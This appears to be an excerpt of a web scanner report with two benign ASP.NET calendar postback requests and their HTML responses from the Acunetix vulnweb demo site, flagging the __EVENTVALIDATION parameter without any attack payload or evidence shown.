Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1127 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,127 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8529&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgAAGlUgUNsIZGRkWnj3JiISvECpSmDw0fntyNtSU8A%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKGnIPsCALQp%2BbjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9%2BDiBQKN9%2BDiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2%2F3gkC5p2%2F3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC%2B6SdxQ8C%2B6SdxQ8C%2B6SxmAcC%2B6SxmAcC%2B6SlPwL7pKU%2FAvuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk%2FawJAvuk%2FawJAvukkcMCAvukkcMCAtzL4%2BgFAtzL4%2BgFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv%2FkPAtzLv%2FkPAtzL050HAtzL050HAtzLxzAC3MvHMALcy%2FvXCQLcy%2FvXCQLcy%2B%2FqAgLcy%2B%2FqAgLcy8PTDwLcy8PTDwLcy%2Ff2CALcy%2Ff2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyAxrwuu%2B3gmskB86sAmiTdIux%2BtLl
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:16:34 GMT Content-Length: 12416
Response Body - size: 12,416 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgAAGlUgUNsIZGRkWnj3JiISvECpSmDw0fntyNtSU8A=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKGnIPsCALQp+bjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9+DiBQKN9+DiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2/3gkC5p2/3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC+6SdxQ8C+6SdxQ8C+6SxmAcC+6SxmAcC+6SlPwL7pKU/Avuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk/awJAvuk/awJAvukkcMCAvukkcMCAtzL4+gFAtzL4+gFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv/kPAtzLv/kPAtzL050HAtzL050HAtzLxzAC3MvHMALcy/vXCQLcy/vXCQLcy+/qAgLcy+/qAgLcy8PTDwLcy8PTDwLcy/f2CALcy/f2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyAxrwuu+3gmskB86sAmiTdIux+tLl" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8527')" style="color:Black" title="May 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8528')" style="color:Black" title="May 08">8</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8529')" style="color:White" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8530')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8531')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8532')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8533')" style="color:Black" title="May 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8534')" style="color:Black" title="May 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8535')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8536')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8537')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8538')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8539')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8540')" style="color:Black" title="May 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8541')" style="color:Black" title="May 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8542')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8543')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8544')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8545')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8546')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8547')" style="color:Black" title="May 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1159 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,159 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8263&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgCAOEMaf9oIZGRkvQyCR7IUB%2BCvzDCSwRT0JEzsFnA%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKGtOawAwKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt%2FQ8CsdKt%2FQ8CsdLBkQcCsdLBkQcCsdK1%2BQUCsdK1%2BQUCsdKpnA0CsdKpnA0Civm7BQKK%2BbsFAor5r9gJAor5r9gJAor5w%2FwCAor5w%2FwCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268Do9Lrx0TlvrywDs44JV4pJUxKQCM%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:23:41 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgCAOEMaf9oIZGRkvQyCR7IUB+CvzDCSwRT0JEzsFnA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKGtOawAwKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt/Q8CsdKt/Q8CsdLBkQcCsdLBkQcCsdK1+QUCsdK1+QUCsdKpnA0CsdKpnA0Civm7BQKK+bsFAor5r9gJAor5r9gJAor5w/wCAor5w/wCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268Do9Lrx0TlvrywDs44JV4pJUxKQCM=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:Black" title="August 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:Black" title="August 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:Black" title="August 15">15</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:White" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:Black" title="August 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:Black" title="August 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
